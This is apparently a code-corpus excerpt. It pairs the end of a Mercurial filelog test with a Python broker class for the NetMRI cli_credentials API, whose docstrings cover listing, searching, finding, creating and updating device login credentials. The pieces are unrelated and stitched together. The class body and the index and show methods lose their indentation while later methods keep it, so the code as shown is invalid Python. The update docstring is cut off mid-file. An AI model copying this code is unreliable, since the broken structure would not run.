# same checks again, this time on a revision marked as a rename
node = addrev(textwith, renamed=True)
if not textwith == fl.read(node):
    error('filelog.read for a renaming + data starting with \\1\\n')
if fl.cmp(node, textwith) or not fl.cmp(node, without):
    error('filelog.cmp for a renaming + data starting with \\1\\n')
if fl.size(1) != len(textwith):
    error('filelog.size for a renaming + data starting with \\1\\n')
print 'OK.'
| iaddict/mercurial.rb | vendor/mercurial/tests/test-filelog.py | Python | mit | 1,549 |
from ..broker import Broker
class CLICredentialBroker(Broker):
    """Broker for the NetMRI ``cli_credentials`` API controller."""
    controller = "cli_credentials"
def index(self, **kwargs):
"""Lists the available cli credentials. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured.
:type UnitID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured.
:type UnitID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this credential.
:type id: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this credential.
:type id: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each CLICredential. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return cli_credentials: An array of the CLICredential objects that match the specified input criteria.
:rtype cli_credentials: Array of CLICredential
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def show(self, **kwargs):
"""Shows the details for the specified cli credential.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The internal NetMRI identifier for this credential.
:type id: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return cli_credential: The cli credential identified by the specified id.
:rtype cli_credential: CLICredential
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def search(self, **kwargs):
    """Lists the available cli credentials matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
    **Inputs**
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param CredentialGroupID: The unique identifier of the credential group.
    :type CredentialGroupID: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param CredentialGroupID: The unique identifier of the credential group.
    :type CredentialGroupID: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param HitCount: The number of successful uses of this credential.
    :type HitCount: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param HitCount: The number of successful uses of this credential.
    :type HitCount: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential.
    :type Origination: String
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential.
    :type Origination: Array of String
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param PasswordSecure: The password portion of the credential.
    :type PasswordSecure: String
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param PasswordSecure: The password portion of the credential.
    :type PasswordSecure: Array of String
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param Priority: The priority order in which to attempt this credential.
    :type Priority: String
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param Priority: The priority order in which to attempt this credential.
    :type Priority: Array of String
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param Protocol: The protocol for which to use this credential.
    :type Protocol: String
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param Protocol: The protocol for which to use this credential.
    :type Protocol: Array of String
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param SecureVersion: The encryption version of the username and password.
    :type SecureVersion: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param SecureVersion: The encryption version of the username and password.
    :type SecureVersion: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param UPWUse: Determines the function of the credential. 'GUESS' indicates that this will only be used if vendor default credential collection is enabled, whereas 'LOCAL' means that this credential will be used in all guessing.
    :type UPWUse: String
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param UPWUse: Determines the function of the credential. 'GUESS' indicates that this will only be used if vendor default credential collection is enabled, whereas 'LOCAL' means that this credential will be used in all guessing.
    :type UPWUse: Array of String
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured.
    :type UnitID: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured.
    :type UnitID: Array of Integer
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param UsernameSecure: The username portion of the credential.
    :type UsernameSecure: String
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param UsernameSecure: The username portion of the credential.
    :type UsernameSecure: Array of String
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param Vendor: The vendor devices against which to try this credential.
    :type Vendor: String
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param Vendor: The vendor devices against which to try this credential.
    :type Vendor: Array of String
    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None
    :param id: The internal NetMRI identifier for this credential.
    :type id: Integer
    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param id: The internal NetMRI identifier for this credential.
    :type id: Array of Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 0
    :param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
    :type start: Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 1000
    :param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
    :type limit: Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` id
    :param sort: The data field(s) to use for sorting the output. Default is id. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID.
    :type sort: Array of String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` asc
    :param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
    :type dir: Array of String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param select: The list of attributes to return for each CLICredential. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID. If empty or omitted, all attributes will be returned.
    :type select: Array
    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
    :type goto_field: String
    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
    :type goto_value: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param query: This value will be matched against cli credentials, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: CredentialGroupID, HitCount, Origination, PasswordSecure, Priority, Protocol, SecureVersion, UPWUse, UnitID, UsernameSecure, Vendor, id.
    :type query: String
    | ``api version min:`` 2.3
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
    :type xml_filter: String
    **Outputs**
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :return cli_credentials: An array of the CLICredential objects that match the specified input criteria.
    :rtype cli_credentials: Array of CLICredential
    """
    # All filtering, query matching, and pagination documented above are
    # performed server-side; this method only forwards kwargs unchanged
    # to the broker's list-request helper under the "search" endpoint.
    return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
    """Lists the available cli credentials matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: CredentialGroupID, HitCount, Origination, PasswordSecure, Priority, Protocol, SecureVersion, UPWUse, UnitID, UsernameSecure, Vendor, id.
    **Inputs**
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_CredentialGroupID: The operator to apply to the field CredentialGroupID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CredentialGroupID: The unique identifier of the credential group. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_CredentialGroupID: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_CredentialGroupID: If op_CredentialGroupID is specified, the field named in this input will be compared to the value in CredentialGroupID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CredentialGroupID must be specified if op_CredentialGroupID is specified.
    :type val_f_CredentialGroupID: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_CredentialGroupID: If op_CredentialGroupID is specified, this value will be compared to the value in CredentialGroupID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CredentialGroupID must be specified if op_CredentialGroupID is specified.
    :type val_c_CredentialGroupID: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_HitCount: The operator to apply to the field HitCount. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. HitCount: The number of successful uses of this credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_HitCount: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_HitCount: If op_HitCount is specified, the field named in this input will be compared to the value in HitCount using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_HitCount must be specified if op_HitCount is specified.
    :type val_f_HitCount: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_HitCount: If op_HitCount is specified, this value will be compared to the value in HitCount using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_HitCount must be specified if op_HitCount is specified.
    :type val_c_HitCount: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_Origination: The operator to apply to the field Origination. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_Origination: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_Origination: If op_Origination is specified, the field named in this input will be compared to the value in Origination using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_Origination must be specified if op_Origination is specified.
    :type val_f_Origination: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_Origination: If op_Origination is specified, this value will be compared to the value in Origination using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_Origination must be specified if op_Origination is specified.
    :type val_c_Origination: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_PasswordSecure: The operator to apply to the field PasswordSecure. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PasswordSecure: The password portion of the credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_PasswordSecure: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_PasswordSecure: If op_PasswordSecure is specified, the field named in this input will be compared to the value in PasswordSecure using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PasswordSecure must be specified if op_PasswordSecure is specified.
    :type val_f_PasswordSecure: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_PasswordSecure: If op_PasswordSecure is specified, this value will be compared to the value in PasswordSecure using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PasswordSecure must be specified if op_PasswordSecure is specified.
    :type val_c_PasswordSecure: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_Priority: The operator to apply to the field Priority. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. Priority: The priority order in which to attempt this credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_Priority: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_Priority: If op_Priority is specified, the field named in this input will be compared to the value in Priority using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_Priority must be specified if op_Priority is specified.
    :type val_f_Priority: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_Priority: If op_Priority is specified, this value will be compared to the value in Priority using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_Priority must be specified if op_Priority is specified.
    :type val_c_Priority: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_Protocol: The operator to apply to the field Protocol. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. Protocol: The protocol for which to use this credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_Protocol: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_Protocol: If op_Protocol is specified, the field named in this input will be compared to the value in Protocol using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_Protocol must be specified if op_Protocol is specified.
    :type val_f_Protocol: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_Protocol: If op_Protocol is specified, this value will be compared to the value in Protocol using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_Protocol must be specified if op_Protocol is specified.
    :type val_c_Protocol: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_SecureVersion: The operator to apply to the field SecureVersion. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SecureVersion: The encryption version of the username and password. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_SecureVersion: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_SecureVersion: If op_SecureVersion is specified, the field named in this input will be compared to the value in SecureVersion using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SecureVersion must be specified if op_SecureVersion is specified.
    :type val_f_SecureVersion: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_SecureVersion: If op_SecureVersion is specified, this value will be compared to the value in SecureVersion using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SecureVersion must be specified if op_SecureVersion is specified.
    :type val_c_SecureVersion: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_UPWUse: The operator to apply to the field UPWUse. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. UPWUse: Determines the function of the credential. 'GUESS' indicates that this will only be used if vendor default credential collection is enabled, whereas 'LOCAL' means that this credential will be used in all guessing. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_UPWUse: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_UPWUse: If op_UPWUse is specified, the field named in this input will be compared to the value in UPWUse using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_UPWUse must be specified if op_UPWUse is specified.
    :type val_f_UPWUse: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_UPWUse: If op_UPWUse is specified, this value will be compared to the value in UPWUse using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_UPWUse must be specified if op_UPWUse is specified.
    :type val_c_UPWUse: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_UnitID: The operator to apply to the field UnitID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_UnitID: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_UnitID: If op_UnitID is specified, the field named in this input will be compared to the value in UnitID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_UnitID must be specified if op_UnitID is specified.
    :type val_f_UnitID: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_UnitID: If op_UnitID is specified, this value will be compared to the value in UnitID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_UnitID must be specified if op_UnitID is specified.
    :type val_c_UnitID: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_UsernameSecure: The operator to apply to the field UsernameSecure. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. UsernameSecure: The username portion of the credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_UsernameSecure: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_UsernameSecure: If op_UsernameSecure is specified, the field named in this input will be compared to the value in UsernameSecure using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_UsernameSecure must be specified if op_UsernameSecure is specified.
    :type val_f_UsernameSecure: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_UsernameSecure: If op_UsernameSecure is specified, this value will be compared to the value in UsernameSecure using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_UsernameSecure must be specified if op_UsernameSecure is specified.
    :type val_c_UsernameSecure: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_Vendor: The operator to apply to the field Vendor. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. Vendor: The vendor devices against which to try this credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_Vendor: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_Vendor: If op_Vendor is specified, the field named in this input will be compared to the value in Vendor using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_Vendor must be specified if op_Vendor is specified.
    :type val_f_Vendor: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_Vendor: If op_Vendor is specified, this value will be compared to the value in Vendor using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_Vendor must be specified if op_Vendor is specified.
    :type val_c_Vendor: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param op_id: The operator to apply to the field id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. id: The internal NetMRI identifier for this credential. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
    :type op_id: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_f_id: If op_id is specified, the field named in this input will be compared to the value in id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_id must be specified if op_id is specified.
    :type val_f_id: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param val_c_id: If op_id is specified, this value will be compared to the value in id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_id must be specified if op_id is specified.
    :type val_c_id: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 0
    :param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
    :type start: Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 1000
    :param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
    :type limit: Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` id
    :param sort: The data field(s) to use for sorting the output. Default is id. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID.
    :type sort: Array of String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` asc
    :param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
    :type dir: Array of String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param select: The list of attributes to return for each CLICredential. Valid values are UnitID, Protocol, Origination, UPWUse, HitCount, Vendor, id, Priority, UsernameSecure, PasswordSecure, SecureVersion, CredentialGroupID. If empty or omitted, all attributes will be returned.
    :type select: Array
    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
    :type goto_field: String
    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
    :type goto_value: String
    | ``api version min:`` 2.3
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
    :type xml_filter: String
    **Outputs**
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :return cli_credentials: An array of the CLICredential objects that match the specified input criteria.
    :rtype cli_credentials: Array of CLICredential
    """
    # The op_*/val_f_*/val_c_* triplets documented above are interpreted by
    # the NetMRI server; locally this method is a pass-through to the broker's
    # list-request helper under the "find" endpoint.
    return self.api_list_request(self._get_method_fullname("find"), kwargs)
def create(self, **kwargs):
    """Creates a new cli credential.
    **Inputs**
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 1
    :param CredentialGroupID: The unique identifier of the credential group.
    :type CredentialGroupID: Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` USER
    :param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential.
    :type Origination: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None
    :param PasswordSecure: The password portion of the credential.
    :type PasswordSecure: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` True
    | ``default:`` None
    :param Priority: The priority order in which to attempt this credential.
    :type Priority: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` ANY
    :param Protocol: The protocol for which to use this credential.
    :type Protocol: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` LOCAL
    :param UPWUse: Determines the function of the credential. 'GUESS' indicates that this will only be used if vendor default credential collection is enabled, whereas 'LOCAL' means that this credential will be used in all guessing.
    :type UPWUse: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 0
    :param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured.
    :type UnitID: Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :param UsernameSecure: The username portion of the credential.
    :type UsernameSecure: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` ANY
    :param Vendor: The vendor devices against which to try this credential.
    :type Vendor: String
    **Outputs**
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :return id: The id of the newly created cli credential.
    :rtype id: Integer
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :return model: The class name of the newly created cli credential.
    :rtype model: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :return uri: A URI that may be used to retrieve the newly created cli credential.
    :rtype uri: String
    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None
    :return cli_credential: The newly created cli credential.
    :rtype cli_credential: CLICredential
    """
    # Required-field enforcement and defaulting (documented above) happen
    # server-side; kwargs are forwarded unchanged as the new record's fields.
    return self.api_request(self._get_method_fullname("create"), kwargs)
def update(self, **kwargs):
    """Updates an existing cli credential.

    **Inputs**

    :param id: The internal NetMRI identifier for this credential. (required)
    :type id: Integer

    :param CredentialGroupID: The unique identifier of the credential group. If omitted, this field will not be updated.
    :type CredentialGroupID: Integer

    :param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential. If omitted, this field will not be updated.
    :type Origination: String

    :param PasswordSecure: The password portion of the credential. If omitted, this field will not be updated.
    :type PasswordSecure: String

    :param Priority: The priority order in which to attempt this credential. If omitted, this field will not be updated.
    :type Priority: String

    :param Protocol: The protocol for which to use this credential. If omitted, this field will not be updated.
    :type Protocol: String

    :param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured. If omitted, this field will not be updated.
    :type UnitID: Integer

    :param UsernameSecure: The username portion of the credential. If omitted, this field will not be updated.
    :type UsernameSecure: String

    :param Vendor: The vendor devices against which to try this credential. If omitted, this field will not be updated.
    :type Vendor: String

    **Outputs**

    :return id: The id of the updated cli credential.
    :rtype id: Integer

